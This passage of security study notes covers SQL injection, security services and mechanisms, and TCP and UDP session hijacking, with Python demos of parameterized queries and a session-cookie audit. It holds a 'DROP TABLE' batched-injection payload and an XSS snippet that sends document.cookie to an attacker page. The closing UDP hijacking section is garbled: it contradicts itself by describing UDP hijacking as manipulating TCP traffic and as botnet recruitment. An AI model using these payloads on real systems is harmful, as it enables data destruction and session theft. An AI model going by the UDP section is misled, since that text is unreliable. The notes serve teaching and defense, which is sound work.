• By analyzing the application's behaviour (a different page, or a delayed response when a time-based payload is used), attackers can determine whether the injected condition was true.

4. Out-of-band SQL Injection
• Uses a different channel (for example a DNS or HTTP request made by the database server to a host the attacker controls) to carry the results to the attacker.
• Allows attackers to exfiltrate sensitive data from the database when no in-band channel is available.

5. Inference-based SQL Injection
• Another name for blind SQL injection: the attacker infers data one true/false question at a time (boolean-based) or by measuring response time (time-based).
• Attackers craft queries whose visible effect differs only according to whether the injected condition holds, and reconstruct the data from many such answers.
Impact of SQL Injection
- The attacker can retrieve all the user data present in the database, such as user details, credit card information and social security numbers, and can also gain access to protected areas like the administrator portal.
- It is also possible to delete user data from the tables.
Nowadays, all online shopping applications and bank transactions use back-end database servers. So if the attacker is able to exploit SQL injection, the entire server is compromised.
SQL Injection Prevention
Developers can use the following prevention measures to prevent SQL injection attacks.
- User authentication and input validation: validate input from the user by predefining the length and type of each input field, and authenticate the user.
- Restrict the access privileges of users and define how much data any outsider can access from the database. Basically, users should not be granted permission to access everything in the database.
- Do not use system administrator accounts.
For more details, refer to the article "How to Protect Against SQL Injection Attacks".
SQL Injection Based on Batched SQL Statements
1. Most databases support batched SQL statements.
2. A batch of SQL statements is a group of two or more SQL statements separated by semicolons.
The SQL statement below will return all rows from the "Users" table and then delete the "Employees" table.
Query:
SELECT * FROM Users;
DROP TABLE Employees;
Look at the following example:
Syntax:
txtEmpId = getRequestString("EmpId");
txtSQL = "SELECT * FROM Users WHERE EmpId = " + txtEmpId;
If the input supplied for EmpId is "116; DROP TABLE Employees", the resulting SQL statement would look like this:
Query:
SELECT * FROM Users WHERE EmpId = 116;
DROP TABLE Employees;
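The two unsafe patterns in these notes (string concatenation of UserId, and batched statements via EmpId) beside the type-validated, parameterized form the prevention list calls for. This is an added example, not code from the original notes; it uses Python's built-in sqlite3 module with constructed Users and Employees tables and made-up rows.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the notes): the Users and Employees
    tables named in the example queries, with a few made-up rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Users VALUES (105, 'alice'), (116, 'bob'), (120, 'carol');
        CREATE TABLE Employees (EmpId INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Employees VALUES (1, 'dave');
    """)
    return conn


def lookup_vulnerable(conn, txt_user_id: str) -> list:
    """The concatenation pattern from the notes: the user's text is pasted into
    the statement, so it becomes SQL syntax rather than a value.  (Python's
    sqlite3 refuses a second ';'-separated statement in execute(); drivers that
    allow batches would run a trailing DROP TABLE as well.)"""
    txt_sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(txt_sql).fetchall()


def lookup_safe(conn, txt_user_id: str) -> list:
    """Hardened form: validate the type first, then bind the value as a
    parameter.  Bound values are sent as data and can never alter the query's
    structure, so 'OR 1=1' or '; DROP TABLE' in the input has no effect."""
    try:
        user_id = int(txt_user_id)      # a UserId must be an integer
    except ValueError:
        return []                       # reject malformed input before any SQL runs
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (user_id,)).fetchall()


def employees_table_exists(conn) -> bool:
    """True while the Employees table is still present (no stacked DROP ran)."""
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'Employees'"
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "105 OR 1=1"                  # the input shown in the notes
    print("concatenated:", lookup_vulnerable(conn, payload))   # every user
    print("parameterized:", lookup_safe(conn, payload))        # [] (rejected)
    print("parameterized, id 105:", lookup_safe(conn, "105"))  # only alice
    print("Employees intact:", employees_table_exists(conn))
```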
Security services:
Security services include authentication, access control, data confidentiality, data integrity, nonrepudiation, and availability.

1. DATA CONFIDENTIALITY: The protection of data from unauthorized disclosure.
   a. Connection Confidentiality: The protection of all user data on a connection.
   b. Connectionless Confidentiality: The protection of all user data in a single data block.
   c. Selective-Field Confidentiality: The confidentiality of selected fields within the user data on a connection or in a single data block.
   d. Traffic Flow Confidentiality: The protection of the information that might be derived from observation of traffic flows.

2. AUTHENTICATION: The assurance that the communicating entity is the one that it claims to be.
   a. Peer Entity Authentication: Provides confidence in the identity of the entities connected.
   b. Data Origin Authentication: In a connectionless transfer, provides assurance that the source of received data is as claimed.

3. ACCESS CONTROL: The prevention of unauthorized use of a resource (i.e., this service controls who can have access to which resource).

4. DATA INTEGRITY: The assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay).
   a. Connection Integrity with Recovery: Provides for the integrity of all user data on a connection and detects any modification, insertion, deletion, or replay of any data within an entire data sequence, with recovery attempted.
   b. Connection Integrity without Recovery: As above, but provides only detection without recovery.
   c. Selective-Field Connection Integrity: Provides for the integrity of selected fields within the user data of a data block transferred over a connection.
   d. Connectionless Integrity: Provides for the integrity of a single connectionless data block.
   e. Selective-Field Connectionless Integrity: Provides for the integrity of selected fields within a single connectionless data block; takes the form of determination of whether the selected fields have been modified.

5. NONREPUDIATION: Provides protection against denial by one of the entities involved in a communication of having participated in all or part of the communication.
   a. Nonrepudiation, Origin: Proof that the message was sent by the specified party.
   b. Nonrepudiation, Destination: Proof that the message was received by the specified party.
Security mechanisms:

A security mechanism is any process (or a device incorporating such a process) that is designed to detect, prevent, or recover from a security attack.
Examples of mechanisms are encryption algorithms, digital signatures, and authentication protocols.
1. Encipherment: Hiding or covering data by using some mathematical transformation is called encipherment; that is, the use of mathematical algorithms to transform data into a form that is not readily intelligible.
2. Data integrity: A variety of mechanisms used to assure the integrity of a data unit or stream of data units; that is, techniques used to protect data from unauthorized alteration.
3. Digital Signature: A technique through which the sender can sign a document electronically and the receiver can verify the signature electronically (the receiver can verify the authenticity of the sender).
4. Authentication Exchange: The sender and receiver exchange some messages to prove their identity to each other.
5. Traffic padding: Inserting some dummy information between the original information to confuse and frustrate the intruder.
6. Notarization: Selecting a third party to control the communication between sender and receiver (the third party acts as proof of the communication between sender and receiver).
7. Routing Control: Sending the data to the receiver through the different available routes rather than a single channel of communication, so that the intruder cannot focus on one particular channel.
8. Access control: A variety of mechanisms that enforce the access rights of users on resources, e.g. PINs, passwords, OTPs.

Relation between Security services and Mechanisms
TCP SESSION HIJACKING:

TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, where an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguises itself as one of the authenticated users. This type of attack is possible because authentication is typically done only at the start of a TCP session.
Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted.
Different ways of session hijacking:
There are many ways to do session hijacking. Some of them are given below.

- Using Packet Sniffers
  In the above figure, it can be seen that the attacker captures the victim's session ID to gain access to the server by using a packet sniffer.
- Cross Site Scripting (XSS attack)
  An attacker can also capture the victim's session ID using an XSS attack with JavaScript. If the attacker sends a crafted link to the victim carrying malicious JavaScript, then when the victim clicks the link the JavaScript runs and carries out the attacker's instructions.

<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>
- IP Spoofing
  Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to a computer by using the IP address of a trusted host. To implement this technique, the attacker has to obtain the IP address of the client and inject his own packets, spoofed with the client's IP address, into the TCP session, so as to fool the server into believing it is communicating with the victim, i.e. the original host.
- Blind Attack
  If the attacker is not able to sniff packets and guess the correct sequence number expected by the server, brute-force combinations of sequence numbers can be tried.
Types of Session Hijacking:


Session hijacking is of three types:
1. Active Session Hijacking: Active session hijacking occurs when the attacker takes control over the active session. The actual user of the network goes offline, and the attacker acts as the authorized user. The attacker can also take control over the communication between the client and the server. To interrupt the communication between client and server, the attacker sends massive traffic at the valid session and causes a denial of service (DoS).
2. Passive Session Hijacking: In passive session hijacking, instead of controlling the whole session of the targeted user, the attacker monitors the communication between the user and the server. The main motive of the hacker is to listen to all the data and record it for future use. Basically, it steals the exchanged information and uses it for other activity. This is also a kind of man-in-the-middle attack (as the attacker sits between the client and the server exchanging information).
3. Hybrid Hijacking: The combination of active session hijacking and passive session hijacking is referred to as hybrid hijacking. Here the attackers monitor the communication channel (the network traffic), and whenever they find a weakness they take control of the web session and carry out their malicious tasks.
To perform all these kinds of session hijacking attacks, attackers use various methods. They may use a single method or more than one method at the same time. Those methods are:
1. Brute-forcing the Session ID
2. Cross-Site Scripting (XSS) or Misdirected Trust
3. Man-in-the-browser
4. Malware infections
These session hijacking methods can be elaborated as follows:
1. Brute-forcing the Session ID: As the name suggests, the attacker uses guessing and trial to find the session ID, which is feasible when the ID is short and poorly protected. The introduction of strong and long session keys has made this method much slower.
2. Cross-Site Scripting (XSS) or Misdirected Trust: In cross-site scripting, the attacker tries to find flaws and weak points in the web server and injects code there. This activity helps the attacker find out the session ID.
3. Man-in-the-browser: Man-in-the-browser uses a Trojan horse (a program containing malicious code) to perform its action. The attacker places themselves in the communication channel between a server and a client. The main purpose of this attack is financial fraud.
4. Malware infections: In malware infections, the attacker deceives the user into opening a link that delivers malware or a Trojan program, which installs malicious software on the device. These programs are written to steal the browser cookies without the user's knowledge.
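The defenses these notes point at can be checked on a Set-Cookie header: HttpOnly stops the document.cookie theft shown in the XSS snippet above, Secure keeps the session ID away from sniffers, and a long random ID defeats brute-forcing. This is an added example, not code from the original notes; the cookie names and values are constructed, and the entropy estimate is a rough heuristic.

```python
import math
import re
import secrets

# Constructed Set-Cookie headers (made up for this example, not from the notes):
# a short, guessable ID with no protective flags, and a hardened one.
SAMPLE_HEADERS = [
    "SESSIONID=12222345; Path=/",
    "SESSIONID=w9Xb3qK8pL2mN7vR4tY6uZ1aS5dF0gH; Path=/; Secure; HttpOnly; SameSite=Lax",
]

def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flags like Secure map to ""
    return name.strip(), value, attrs

def charset_bits(value: str) -> float:
    """Rough upper bound on the ID's entropy: log2(alphabet) per character,
    with the alphabet inferred from the character classes actually used."""
    size = 0
    for pattern, count in ((r"[0-9]", 10), (r"[a-z]", 26), (r"[A-Z]", 26), (r"[^0-9A-Za-z]", 32)):
        if re.search(pattern, value):
            size += count
    return len(value) * math.log2(size) if size else 0.0

def audit_session_cookie(header: str, min_bits: float = 64.0) -> list:
    """Return the weaknesses found; an empty list means the cookie passes."""
    _, value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:     # document.cookie can read it (XSS theft)
        findings.append("missing HttpOnly")
    if "secure" not in attrs:       # sent in clear text, easy to sniff
        findings.append("missing Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict")
    if charset_bits(value) < min_bits:   # short or guessable: brute-forceable
        findings.append(f"session ID too short or predictable ({charset_bits(value):.0f} bits)")
    return findings

def new_session_cookie() -> str:
    """Issue a cookie the way the notes recommend: a long CSPRNG-generated ID
    plus the protective attributes."""
    return "SESSIONID=" + secrets.token_urlsafe(32) + "; Path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    for h in SAMPLE_HEADERS + [new_session_cookie()]:
        print(h.split(";")[0][:30], "->", audit_session_cookie(h) or "OK")
```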

UDP SESSION HIJACKING:

UDP is a low-level transport protocol used on LANs and WANs to send packets between two endpoints. UDP session hijacking is an attack where the attacker tricks the victim into using their computer as part of a botnet, typically by sending them unsolicited requests disguised as coming from legitimate sources. This illegitimate traffic can then be used to exploit vulnerable systems or steal data. UDP session hijacking is a method of compromising a computer session by manipulating the session's Transmission Control Protocol (TCP) traffic. The attacker manipulates the data sent over the network, which can then be used to hijack the session or steal information.

There are a number of risks involved with UDP session hijacking in ethical hacking. Firstly, UDP packets are not encrypted and are therefore easier to capture and manipulate. This makes it easier for the attacker to steal data or hijack the session. Additionally, the attacker has control over the data being sent, which means they can tamper with it in a number of ways. This could allow them to steal information or modify it in order to exploit the system.

UDP Hijacking Attacks:

- One of the most powerful attacks is hijacking a UDP broadcast. This allows the attacker to steal data like passwords and credit card numbers.
- The attacker, who can be someone nearby or halfway around the world, accesses the information by sending a false reply to the victim's communication request to an application that uses UDP as its transport protocol.
- This is possible in the Windows XP, Windows Vista, Windows 7, and Windows 8 operating systems.
- UDP packets are accepted by default on most versions of Microsoft operating systems since XP. It is the default setting for anyone using an application on these operating systems. Since these packets are not verified by the operating system, a hacker can send a reply to another legitimate user's request.
- This allows the hacker to receive useful data like passwords and credit card numbers from the unsuspecting user. This is dangerous because nobody notices anything unless the session gets degraded or broken because of a lack of response from the server.
- If firewall protection is in place, it will notify the user and block any unauthorized incoming packets.

A Scenario of UDP Session Hijacking:

- In UDP session hijacking, an attacker does not need features of the Transmission Control Protocol, such as sequence numbers and the ACK mechanism, to perform session hijacking.
- These attacks took place in the wild back at the beginning of 1995. In this attack, the attacker is concerned with the connection between terminals.